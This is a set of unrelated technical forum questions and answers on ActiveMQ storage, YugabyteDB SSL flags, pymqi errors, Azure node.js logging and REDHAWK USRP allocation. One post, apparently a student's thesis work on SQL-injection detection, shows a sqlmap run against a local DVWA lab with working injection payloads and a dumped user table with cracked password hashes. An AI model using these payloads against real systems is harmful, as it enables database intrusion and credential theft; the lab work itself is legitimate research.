I am facing problem of messages getting struck in activemq queue (with master slave configuration) and consumer is not able to consume messages when I pump around ~100 messages to different queues.
I have configured ActiveMQ (v5.9.0) message broker in two separate linux instances in master-slave mode. For persistenceAdapter conf on both the instances, I have mounted a NAS storage onto both the instances where activemq server is running. Hence same NAS storage is mounted on both activemq instances at mount point '/mnt/nas'. The size of the NAS storage is 20 GB.
So my persistenceAdapter conf looks like below
<persistenceAdapter>
<kahaDB directory="/mnt/nas" ignoreMissingJournalfiles="true" checkForCorruptJournalFiles="true" checksumJournalFiles="true"/>
</persistenceAdapter>
The systemUsage configuration on both activemq server is like below
<systemUsage>
<systemUsage>
<memoryUsage>
<memoryUsage percentOfJvmHeap = "70"/>
</memoryUsage>
<storeUsage>
<storeUsage limit = "15 gb"/>
</storeUsage>
<tempUsage>
<tempUsage limit = "7 gb"/>
</tempUsage>
</systemUsage>
</systemUsage>
and I have enabled only 'tcp' transport connector
<transportConnector name = "openwire" uri = "tcp://0.0.0.0:61616 maximumConnections=1000&wireFormat.maxFrameSize=104857600"/>
When I see the partition details of the mount point '/mnt/nas' on both activemq instances, I see following for the command df -k
Filesystem 1K-blocks Used Available Use% Mounted on
/dev/xvda2 102953264 5840280 91883264 6% /
tmpfs 967652 0 967652 0% /dev/shm
/dev/xvda1 253871 52511 188253 22% /boot
//nas151.service.softlayer.com/IBM278684-16
139328579072 56369051136 82959527936 41% /mnt/nas
Hence I see 41% of /mnt/nas is used
The problem is when I start the activemq server (on both instances), I see the following messages in the activemq.log
**************** START ***************
2014-06-05 12:48:40,350 | INFO | PListStore:[/var/lib/apache-activemq-5.9.0/data/localhost/tmp_storage] started | org.apache.activemq.store.kahadb.plist.PListStoreImpl | main
2014-06-05 12:48:40,454 | INFO | JMX consoles can connect to service:jmx:rmi:///jndi/rmi://localhost:1099/jmxrmi | org.apache.activemq.broker.jmx.ManagementContext | JMX connector
2014-06-05 12:48:40,457 | INFO | Using Persistence Adapter: KahaDBPersistenceAdapter[/mnt/nas] | org.apache.activemq.broker.BrokerService | main
2014-06-05 12:48:40,612 | INFO | Corrupt journal records found in '/mnt/nas/db-1.log' between offsets: 8163..8209 | org.apache.activemq.store.kahadb.disk.journal.Journal | main
2014-06-05 12:48:40,613 | INFO | Corrupt journal records found in '/mnt/nas/db-1.log' between offsets: 12256..12327 | org.apache.activemq.store.kahadb.disk.journal.Journal | main
2014-06-05 12:48:40,649 | INFO | Corrupt journal records found in '/mnt/nas/db-1.log' between offsets: 20420..20585 | org.apache.activemq.store.kahadb.disk.journal.Journal | main
2014-06-05 12:48:40,650 | INFO | Corrupt journal records found in '/mnt/nas/db-1.log' between offsets: 28559..28749 | org.apache.activemq.store.kahadb.disk.journal.Journal | main
2014-06-05 12:48:40,651 | INFO | Corrupt journal records found in '/mnt/nas/db-1.log' between offsets: 32677..32842 | org.apache.activemq.store.kahadb.disk.journal.Journal | main
2014-06-05 12:48:40,652 | INFO | Corrupt journal records found in '/mnt/nas/db-1.log' between offsets: 36770..36960 | org.apache.activemq.store.kahadb.disk.journal.Journal | main
2014-06-05 12:48:40,655 | INFO | Corrupt journal records found in '/mnt/nas/db-1.log' between offsets: 49099..49264 | org.apache.activemq.store.kahadb.disk.journal.Journal | main
2014-06-05 12:48:40,657 | INFO | Corrupt journal records found in '/mnt/nas/db-1.log' between offsets: 61403..61474 | org.apache.activemq.store.kahadb.disk.journal.Journal | main
2014-06-05 12:48:40,658 | INFO | Corrupt journal records found in '/mnt/nas/db-1.log' between offsets: 65521..65567 | org.apache.activemq.store.kahadb.disk.journal.Journal | main
2014-06-05 12:48:40,659 | INFO | Corrupt journal records found in '/mnt/nas/db-1.log' between offsets: 69614..69685 | org.apache.activemq.store.kahadb.disk.journal.Journal | main
2014-06-05 12:48:40,660 | INFO | Corrupt journal records found in '/mnt/nas/db-1.log' between offsets: 77778..77824 | org.apache.activemq.store.kahadb.disk.journal.Journal | main
2014-06-05 12:48:41,543 | INFO | KahaDB is version 5 | org.apache.activemq.store.kahadb.MessageDatabase | main
2014-06-05 12:48:41,592 | INFO | Recovering from the journal ... | org.apache.activemq.store.kahadb.MessageDatabase | main
2014-06-05 12:48:41,604 | INFO | Recovery replayed 66 operations from the journal in 0.028 seconds. | org.apache.activemq.store.kahadb.MessageDatabase | main
2014-06-05 12:48:41,772 | INFO | Apache ActiveMQ 5.9.0 (localhost, ID:10.106.99.101-60576-1401972521638-0:1) is starting | org.apache.activemq.broker.BrokerService | main
2014-06-05 12:48:41,892 | INFO | Listening for connections at: tcp://10.106.99.101:61616?maximumConnections=1000&wireFormat.maxFrameSize=104857600 | org.apache.activemq.transport.TransportServerThreadSupport | main
2014-06-05 12:48:41,893 | INFO | Connector openwire started | org.apache.activemq.broker.TransportConnector | main
2014-06-05 12:48:41,893 | INFO | Apache ActiveMQ 5.9.0 (localhost, ID:10.106.99.101-60576-1401972521638-0:1) started | org.apache.activemq.broker.BrokerService | main
2014-06-05 12:48:41,893 | INFO | For help or more information please see: http://activemq.apache.org | org.apache.activemq.broker.BrokerService | main
2014-06-05 12:48:41,897 | WARN | Store limit is 2048 mb, whilst the data directory: /mnt/nas only has 0 mb of usable space - resetting to maximum available disk space: 0 mb | org.apache.activemq.broker.BrokerService | main
2014-06-05 12:48:41,897 | ERROR | Store limit is 0 mb, whilst the max journal file size for the store is: 32 mb, the store will not accept any data when used. | org.apache.activemq.broker.BrokerService | main
******************** END **************
I see 'Corrupt journal records found in '/mnt/nas/db-1.log'. This comes for everytime restart even though if I delete this file and restart.
I had put the flag to recover but still this log entry comes for every restart.
Another problem is, even though my NAS storage is 20GB, it shows '/mnt/nas only has 0 mb of usable space'. This is really weird. I am not sure why 0 MB is available to activemq
I request people here to give me some suggestions on why it is happening like this and suggest me any better configurations to avoid messages getting struck in queue.
Thanks
Raagu
Related
[Question posted by a user on YugabyteDB Community Slack]
I'm running the yb-cluster of 3 logical node on 1 VM. I am trying with SSL Mode enabled cluster. Below is the property file i am using to start the cluster with SSL Mode ON:
./bin/yugabyted start --config /data/ybd1/config_1.config
./bin/yugabyted start --base_dir=/data/ybd2 --listen=127.0.0.2 --join=192.168.56.12
./bin/yugabyted start --base_dir=/data/ybd3 --listen=127.0.0.3 --join=192.168.56.12
my config file:
{
"base_dir": "/data/ybd1",
"listen": "192.168.56.12",
"certs_dir": "/root/192.168.56.12/",
"allow_insecure_connections": "false",
"use_node_to_node_encryption": "true"
"use_client_to_server_encryption": "true"
}
I am able to connect using:
bin/ysqlsh -h 127.0.0.3 -U yugabyte -d yugabyte
ysqlsh (11.2-YB-2.11.1.0-b0)
Type "help" for help.
yugabyte=# \l
List of databases
Name | Owner | Encoding | Collate | Ctype | Access privileges
-----------------+----------+----------+---------+-------------+-----------------------
postgres | postgres | UTF8 | C | en_US.UTF-8 |
system_platform | postgres | UTF8 | C | en_US.UTF-8 |
template0 | postgres | UTF8 | C | en_US.UTF-8 | =c/postgres +
| | | | | postgres=CTc/postgres
template1 | postgres | UTF8 | C | en_US.UTF-8 | =c/postgres +
| | | | | postgres=CTc/postgres
yugabyte | postgres | UTF8 | C | en_US.UTF-8 |
But when I am trying to connect to my yb-cluster from psql client. I am getting below errors.
psql -h 192.168.56.12 -p 5433
psql: error: connection to server at "192.168.56.12", port 5433 failed: FATAL: Timed out: OpenTable RPC (request call id 2) to 192.168.56.12:9100 timed out after 120.000s
postgres#acff2570dfbc:~$
And in yb t-server logs I am getting below errors:
I0228 05:00:21.248733 21631 async_initializer.cc:90] Successfully built ybclient
2022-02-28 05:02:21.248 UTC [21624] FATAL: Timed out: OpenTable RPC (request call id 2) to 192.168.56.12:9100 timed out after 120.000s
I0228 05:02:21.251086 21627 poller.cc:66] Poll stopped: Service unavailable (yb/rpc/scheduler.cc:80): Scheduler is shutting down (system error 108)
2022-02-28 05:54:20.987 UTC [23729] LOG: invalid length of startup packet
Any HELP in this regard is really apricated.
You’re setting your config wrong when using yugabyted tool. You want to use --master_flags and --tserver_flags like explained in the docs: https://docs.yugabyte.com/latest/reference/configuration/yugabyted/#flags.
An example:
bin/yugabyted start --base_dir=/data/ybd1 --listen=192.168.56.12 --tserver_flags=use_client_to_server_encryption=true,ysql_enable_auth=true,use_cassandra_authentication=true,certs_for_client_dir=/root/192.168.56.12/
Sending the parameters this way should work on your cluster.
I'm writing thesis for my university.
My theme of thesis is "SQL injection detection by using Machine Learning"
To use Machine Learning, first of all, I need thousands of learning data of SQL injection attack.
For that, I proceeded below process.
Install Virtual Box
Install Kali Linux on Virtual Box
Install DVWA(Damn Vulnerable Web Application) on Kali Linux
Attack to DVWA by using sqlmap
On No.4, I succeeded in attacking to DVWA, but I don't know how to get bunch of attacking data.
What I want to get is bunch of actual attacking SQL.
1. launched server.
┌──(root💀kali)-[/home/kali]
└─# service apache2 start
┌──(root💀kali)-[/home/kali]
└─# service mysql start
2. Got cookie and target URL
document.cookie
"security=low; PHPSESSID=cookieinfo"
3 Attack
┌──(root💀kali)-[/usr/bin]
└─# sqlmap -o -u "http://localhost/DVWA-master/vulnerabilities/sqli/?id=1&Submit=Submit" --cookie="PHPSESSID=[cookieinfo];security=low" --dump
___
__H__
___ ___[,]_____ ___ ___ {1.4.11#stable}
|_ -| . ['] | .'| . |
|___|_ [.]_|_|_|__,| _|
|_|V... |_| http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting # 10:08:01 /2020-12-01/
[10:08:01] [INFO] resuming back-end DBMS 'mysql'
[10:08:01] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
Payload: id=1' AND (SELECT 1995 FROM(SELECT COUNT(*),CONCAT(0x7162707a71,(SELECT (ELT(1995=1995,1))),0x71626a7871,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- qoRd&Submit=Submit
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: id=1' AND (SELECT 9863 FROM (SELECT(SLEEP(5)))PIFI)-- JYNK&Submit=Submit
Type: UNION query
Title: MySQL UNION query (NULL) - 2 columns
Payload: id=1' UNION ALL SELECT NULL,CONCAT(0x7162707a71,0x744e45686f7a55414a6744636c497367666d62567679764247415656677779516a76584474645269,0x71626a7871)#&Submit=Submit
---
[10:08:01] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Debian
web application technology: Apache 2.4.46
back-end DBMS: MySQL >= 5.0 (MariaDB fork)
[10:08:01] [WARNING] missing database parameter. sqlmap is going to use the current database to enumerate table(s) entries
[10:08:01] [INFO] fetching current database
[10:08:01] [INFO] fetching tables for database: 'dvwa'
[10:08:01] [INFO] fetching columns for table 'users' in database 'dvwa'
[10:08:01] [INFO] fetching entries for table 'users' in database 'dvwa'
[10:08:01] [INFO] recognized possible password hashes in column 'password'
do you want to store hashes to a temporary file for eventual further processing with other tools [y/N] y
[10:08:07] [INFO] writing hashes to a temporary file '/tmp/sqlmaphbMPEH3181/sqlmaphashes-7QbpSl.txt'
do you want to crack them via a dictionary-based attack? [Y/n/q] y
[10:08:12] [INFO] using hash method 'md5_generic_passwd'
[10:08:12] [INFO] resuming password 'password' for hash '5f4dcc3b5aa765d61d8327deb882cf99'
[10:08:12] [INFO] resuming password 'charley' for hash '8d3533d75ae2c3966d7e0d4fcc69216b'
[10:08:12] [INFO] resuming password 'letmein' for hash '0d107d09f5bbe40cade3de5c71e9e9b7'
[10:08:12] [INFO] resuming password 'abc123' for hash 'e99a18c428cb38d5f260853678922e03'
Database: dvwa
Table: users
[5 entries]
+---------+-----------------------------------------+---------+---------------------------------------------+-----------+------------+---------------------+--------------+
| user_id | avatar | user | password | last_name | first_name | last_login | failed_login |
+---------+-----------------------------------------+---------+---------------------------------------------+-----------+------------+---------------------+--------------+
| 1 | /DVWA-master/hackable/users/admin.jpg | admin | 5f4dcc3b5aa765d61d8327deb882cf99 (password) | admin | admin | 2020-11-29 01:54:52 | 0 |
| 2 | /DVWA-master/hackable/users/gordonb.jpg | gordonb | e99a18c428cb38d5f260853678922e03 (abc123) | Brown | Gordon | 2020-11-29 01:54:52 | 0 |
| 3 | /DVWA-master/hackable/users/1337.jpg | 1337 | 8d3533d75ae2c3966d7e0d4fcc69216b (charley) | Me | Hack | 2020-11-29 01:54:52 | 0 |
| 4 | /DVWA-master/hackable/users/pablo.jpg | pablo | 0d107d09f5bbe40cade3de5c71e9e9b7 (letmein) | Picasso | Pablo | 2020-11-29 01:54:52 | 0 |
| 5 | /DVWA-master/hackable/users/smithy.jpg | smithy | 5f4dcc3b5aa765d61d8327deb882cf99 (password) | Smith | Bob | 2020-11-29 01:54:52 | 0 |
+---------+-----------------------------------------+---------+---------------------------------------------+-----------+------------+---------------------+--------------+
[10:08:12] [INFO] table 'dvwa.users' dumped to CSV file '/root/.local/share/sqlmap/output/localhost/dump/dvwa/users.csv'
[10:08:12] [INFO] fetching columns for table 'guestbook' in database 'dvwa'
[10:08:12] [INFO] fetching entries for table 'guestbook' in database 'dvwa'
Database: dvwa
Table: guestbook
[1 entry]
+------------+------+-------------------------+
| comment_id | name | comment |
+------------+------+-------------------------+
| 1 | test | This is a test comment. |
+------------+------+-------------------------+
[10:08:13] [INFO] table 'dvwa.guestbook' dumped to CSV file '/root/.local/share/sqlmap/output/localhost/dump/dvwa/guestbook.csv'
[10:08:13] [INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/localhost'
[*] ending # 10:08:13 /2020-12-01/
What I want to get is bunch of actual attacking SQL.
Please anyone help me. Thank you.
I am getting the below error while connecting to IBM MQ using library pymqi.
Its a clustered MQ channel
Traceback (most recent call last):
File "postToQueue.py", line 432, in <module>
qmgr = pymqi.connect(queue_manager, channel, conn_info)
File "C:\Python\lib\site-packages\pymqi\__init__.py", line 2608, in connect
qmgr.connect_tcp_client(queue_manager or '', CD(), channel, conn_info, user, password)
File "C:\Python\lib\site-packages\pymqi\__init__.py", line 1441, in connect_tcp_client
self.connect_with_options(name, cd, user=user, password=password)
File "C:\Python\lib\site-packages\pymqi\__init__.py", line 1423, in connect_with_options
raise MQMIError(rv[1], rv[2])
pymqi.MQMIError: MQI Error. Comp: 2, Reason 2012: FAILED: MQRC_ENVIRONMENT_ERROR'
Please see my code below.
queue_manager = 'quename here'
channel = 'channel name here'
host ='host-name here'
port = '2333'
queue_name = 'queue name here'
message = 'my message here'
conn_info = '%s(%s)' % (host, port)
print(conn_info)
qmgr = pymqi.connect(queue_manager, channel, conn_info)
queue = pymqi.Queue(qmgr, queue_name)
queue.put(message)
print("message sent")
queue.close()
qmgr.disconnect()
Getting error at the line below
qmgr = pymqi.connect(queue_manager, channel, conn_info)
Added the IBM client to scripts folder as well , using Windows 10 , Python 3.8.1 and IBM Client 9.1 windows client installation image, Below is the header
-----------------------------------------------------------------------------+
| |
| WebSphere MQ First Failure Symptom Report |
| ========================================= |
| |
| Date/Time :- Tue January 28 2020 16:27:51 Eastern Standard Time |
| UTC Time :- 1580246871.853000 |
| UTC Time Offset :- -300 (Eastern Standard Time) |
| Host Name :- CA-LDLD0SQ2 |
| Operating System :- Windows 10 Enterprise x64 Edition, Build 17763 |
| PIDS :- 5724H7251 |
| LVLS :- 8.0.0.11 |
| Product Long Name :- IBM MQ for Windows (x64 platform) |
| Vendor :- IBM |
| O/S Registered :- 0 |
| Data Path :- C:\Python\Scripts\IBM |
| Installation Path :- C:\Python |
| Installation Name :- MQNI08000011 (126) |
| License Type :- Unknown |
| Probe Id :- XC207013 |
| Application Name :- MQM |
| Component :- xxxInitialize |
| SCCS Info :- F:\build\slot1\p800_P\src\lib\cs\amqxeida.c, |
| Line Number :- 5085 |
| Build Date :- Dec 12 2018 |
| Build Level :- p800-011-181212.1 |
| Build Type :- IKAP - (Production) |
| UserID :- alekhya.machiraju |
| Process Name :- C:\Python\python.exe |
| Arguments :- |
| Addressing mode :- 32-bit |
| Process :- 00010908 |
| Thread :- 00000001 |
| Session :- 00000001 |
| UserApp :- TRUE |
| Last HQC :- 0.0.0-0 |
| Last HSHMEMB :- 0.0.0-0 |
| Last ObjectName :- |
| Major Errorcode :- xecF_E_UNEXPECTED_SYSTEM_RC |
| Minor Errorcode :- OK |
| Probe Type :- INCORROUT |
| Probe Severity :- 2 |
| Probe Description :- AMQ6090: MQM could not display the text for error |
| 536895781. |
| FDCSequenceNumber :- 0 |
| Comment1 :- WinNT error 1082155270 from Open ccsid.tbl. |
| |
+-----------------------------------------------------------------------------+
I have a node.js api app on azure. I use bunyan to log every request to sdtout. How can I save and read the log files? I enabled BLOB-logging. The only thing that shows up in my storage is a bunch of csv-files. Here is an example:
| date | level | applicationName | instanceId | eventId | pid | tid | message
_______________________________________________________________________________________________________________________________________________________________
| 2017-05-17T14:21:15 | Verbose | myApp | tae9d6 | 636306276755847146 | 13192 | -1 | SnapshotHelper::RestoreSnapshotInternal SUCCESS - File.Copy
| 2017-05-17T14:21:15 | Verbose | myApp | tae9d6 | 636306276756784690 | 13192 | -1 | SnapshotHelper::RestoreSnapshotInternal SUCCESS - process
Where are my logs, that I printed to stdout?
1) Create file iisnode.yml in your root folder (D:\home\site\wwwroot) if not exists.
2) Add the following lines to it.
loggingEnabled: true
logDirectory: iisnode
After that done, you can find logs in D:\home\site\wwwroot\iisnode.
For more info, please refer to https://learn.microsoft.com/en-us/azure/app-service-web/web-sites-nodejs-debug#enable-logging.
After above settings in iisnode.yml, the logs you see D:\home\site\wwwroot\iisnode are from BLOB storage or file system.
I'm using Redhawk 1.10.0 on a CentOS 6.5 machine 64 bit and USRP b100 with UHD driver 3.7.2.
The USRP b100 is recognized correctly by the system. It is a USB device.
I downloaded the latest version of UHD_USRP Device ver. 3.0 for REDHAWK and I created a Node including a GPP and a UHD_USRP devices.
The Node is started without any problem but when I run a simple waveform to read data from the USRP as a RX_DIGITIZER I got the following error:
Failed to create application: usrp_test_248_173059195 Failed to satisfy 'usesdevice'
dependencies DCE:18964b3d-392e-4b98-a90d-0569b5d46ffefor application 'usrp_test_248_173059195'
IDL:CF/ApplicationFactory/CreateApplicationError:1.0
The log of the Device Manager reports that:
2014-09-05 17:31:03 TRACE FrontendTunerDevice:369 - CORBA::Boolean frontend::FrontendTunerDevice<TunerStatusStructType>::allocateCapacity(const CF::Properties&) [with TunerStatusStructType = frontend_tuner_status_struct_struct]
2014-09-05 17:31:03 INFO FrontendTunerDevice:502 - allocateCapacity: NO AVAILABLE TUNER. Make sure that the device has an initialized frontend_tuner_status
2014-09-05 17:31:03 TRACE FrontendTunerDevice:578 - void frontend::FrontendTunerDevice<TunerStatusStructType>::deallocateCapacity(const CF::Properties&) [with TunerStatusStructType = frontend_tuner_status_struct_struct]
2014-09-05 17:31:03 DEBUG FrontendTunerDevice:603 - ALLOCATION_ID NOT FOUND: [usrpAllocation]
2014-09-05 17:31:03 DEBUG FrontendTunerDevice:637 - ERROR WHEN DEALLOCATING. SKIPPING...
The Node console:
2014-09-05 17:31:39 TRACE ApplicationFactory_impl:2132 - Done building Component Info From SPD File
2014-09-05 17:31:39 TRACE ApplicationFactory_impl:1040 - Application has 1 usesdevice dependencies
2014-09-05 17:31:39 TRACE prop_utils:509 - setting struct item FRONTEND::tuner_allocation::allocation_id
2014-09-05 17:31:39 TRACE prop_utils:509 - setting struct item FRONTEND::tuner_allocation::bandwidth
2014-09-05 17:31:39 TRACE prop_utils:509 - setting struct item FRONTEND::tuner_allocation::center_frequency
2014-09-05 17:31:39 TRACE prop_utils:509 - setting struct item FRONTEND::tuner_allocation::group_id
2014-09-05 17:31:39 TRACE prop_utils:509 - setting struct item FRONTEND::tuner_allocation::rf_flow_id
2014-09-05 17:31:39 TRACE prop_utils:509 - setting struct item FRONTEND::tuner_allocation::sample_rate
2014-09-05 17:31:39 TRACE prop_utils:509 - setting struct item FRONTEND::tuner_allocation::tuner_type
2014-09-05 17:31:39 TRACE AllocationManager_impl:134 - Servicing 1 allocation request(s)
2014-09-05 17:31:39 TRACE AllocationManager_impl:144 - Allocation request DCE:18964b3d-392e-4b98-a90d-0569b5d46ffe contains 3 properties
2014-09-05 17:31:39 TRACE AllocationManager_impl:243 - Allocating against device uhd_node:USRP_UHD_1
2014-09-05 17:31:39 TRACE AllocationManager_impl:353 - Matching DCE:cdc5ee18-7ceb-4ae6-bf4c-31f983179b4d 'FRONTEND::TUNER' eq 'FRONTEND::TUNER'
2014-09-05 17:31:39 TRACE AllocationManager_impl:353 - Matching DCE:0f99b2e4-9903-4631-9846-ff349d18ecfb 'USRP' eq 'USRP'
2014-09-05 17:31:39 TRACE AllocationManager_impl:395 - Adding external property FRONTEND::tuner_allocation
2014-09-05 17:31:39 TRACE AllocationManager_impl:407 - Matched 2 properties
2014-09-05 17:31:39 TRACE AllocationManager_impl:264 - Allocating 1 properties (1 calls)
2014-09-05 17:31:39 TRACE AllocationManager_impl:267 - Device lacks sufficient capacity
2014-09-05 17:31:39 TRACE AllocationManager_impl:243 - Allocating against device uhd_node:GPP_1
2014-09-05 17:31:39 TRACE AllocationManager_impl:353 - Matching DCE:cdc5ee18-7ceb-4ae6-bf4c-31f983179b4d 'GPP' eq 'FRONTEND::TUNER'
2014-09-05 17:31:39 TRACE AllocationManager_impl:248 - Matching failed
2014-09-05 17:31:39 DEBUG ApplicationFactory_impl:1060 - Failed to satisfy 'usesdevice' dependencies DCE:18964b3d-392e-4b98-a90d-0569b5d46ffefor application 'usrp_test_248_173059195'
2014-09-05 17:31:39 TRACE ApplicationFactory_impl:528 - Unbinding the naming context
2014-09-05 17:31:39 TRACE Properties:85 - Destruction for properties
2014-09-05 17:31:39 TRACE PRF:312 - Deleting PRF containing 4 properties
I used the following parameters:
<usesdevicedependencies>
<usesdevice id="DCE:18964b3d-392e-4b98-a90d-0569b5d46ffe"
type="usesUSRP">
<propertyref refid="DCE:cdc5ee18-7ceb-4ae6-bf4c-31f983179b4d"
value="FRONTEND::TUNER" />
<propertyref refid="DCE:0f99b2e4-9903-4631-9846-ff349d18ecfb"
value="USRP" />
<structref refid="FRONTEND::tuner_allocation">
<simpleref refid="FRONTEND::tuner_allocation::tuner_type"
value="RX_DIGITIZER" />
<simpleref refid="FRONTEND::tuner_allocation::allocation_id"
value="usrpAllocation" />
<simpleref refid="FRONTEND::tuner_allocation::center_frequency"
value="102500000" />
<simpleref refid="FRONTEND::tuner_allocation::bandwidth"
value="320000" />
<simpleref refid="FRONTEND::tuner_allocation::sample_rate"
value="250000" />
<simpleref refid="FRONTEND::tuner_allocation::group_id"
value="" />
<simpleref refid="FRONTEND::tuner_allocation::rf_flow_id"
value="" />
</structref>
</usesdevice>
</usesdevicedependencies>
The b100 configuration is the following:
-- USRP-B100 clock control: 10
-- r_counter: 2
-- a_counter: 0
-- b_counter: 20
-- prescaler: 8
-- vco_divider: 5
-- chan_divider: 5
-- vco_rate: 1600.000000MHz
-- chan_rate: 320.000000MHz
-- out_rate: 64.000000MHz
--
_____________________________________________________
/
| Device: B-Series Device
| _____________________________________________________
| /
| | Mboard: B100
| | revision: 8192
| | serial: E5R10Z1B1
| | FW Version: 4.0
| | FPGA Version: 11.4
| |
| | Time sources: none, external, _external_
| | Clock sources: internal, external, auto
| | Sensors: ref_locked
| | _____________________________________________________
| | /
| | | RX DSP: 0
| | | Freq range: -32.000 to 32.000 Mhz
| | _____________________________________________________
| | /
| | | RX Dboard: A
| | | ID: WBX v3, WBX v3 + Simple GDB (0x0057)
| | | Serial: E5R1BW6XW
| | | _____________________________________________________
| | | /
| | | | RX Frontend: 0
| | | | Name: WBXv3 RX+GDB
| | | | Antennas: TX/RX, RX2, CAL
| | | | Sensors: lo_locked
| | | | Freq range: 68.750 to 2200.000 Mhz
| | | | Gain range PGA0: 0.0 to 31.5 step 0.5 dB
| | | | Connection Type: IQ
| | | | Uses LO offset: No
| | | _____________________________________________________
| | | /
| | | | RX Codec: A
| | | | Name: ad9522
| | | | Gain range pga: 0.0 to 20.0 step 1.0 dB
| | _____________________________________________________
| | /
| | | TX DSP: 0
| | | Freq range: -32.000 to 32.000 Mhz
| | _____________________________________________________
| | /
| | | TX Dboard: A
| | | ID: WBX v3 (0x0056)
| | | Serial: E5R1BW6XW
| | | _____________________________________________________
| | | /
| | | | TX Frontend: 0
| | | | Name: WBXv3 TX+GDB
| | | | Antennas: TX/RX, CAL
| | | | Sensors: lo_locked
| | | | Freq range: 68.750 to 2200.000 Mhz
| | | | Gain range PGA0: 0.0 to 31.0 step 1.0 dB
| | | | Connection Type: IQ
| | | | Uses LO offset: No
| | | _____________________________________________________
| | | /
| | | | TX Codec: A
| | | | Name: ad9522
| | | | Gain range pga: -20.0 to 0.0 step 0.1 dB
Where's my fault?
Thanks in advance for any help.
The frontend_tuner_status struct sequence is what defines the device capabilities and capacity. If the sequence is empty, the allocation will always result in lack of capacity. An empty frontend_tuner_status property is usually the result of not specifying the target device, or not being able to find the specified target device.
You must specify the target device using the target_device struct property. This can be done within the Node or at run-time. Previous versions of the USRP_UHD REDHAWK Device only allowed the IP address to be specified using a property, but in order to support USB-connected (and in general, non-network-connected) USRP devices, this has been replaced with the target_device struct property.
The target_device property allows the user to specify ip_address, name, serial, or type, and will use the first USRP hardware device that meets the criteria, if one is found. The information that should be specified in the target_device struct can be determined by setting the update_available_devices property to true, causing the available_devices struct sequence to be populated with all found devices (the same devices and information that is reported by the command line tool uhd_find_devices).
To determine if the USRP_UHD REDHAWK Device is connected to a target device, inspect the properties. Specifically, frontend_tuner_status sequence will be empty if not linked to a hardware device, as well as the device_motherboards and device_channels properties.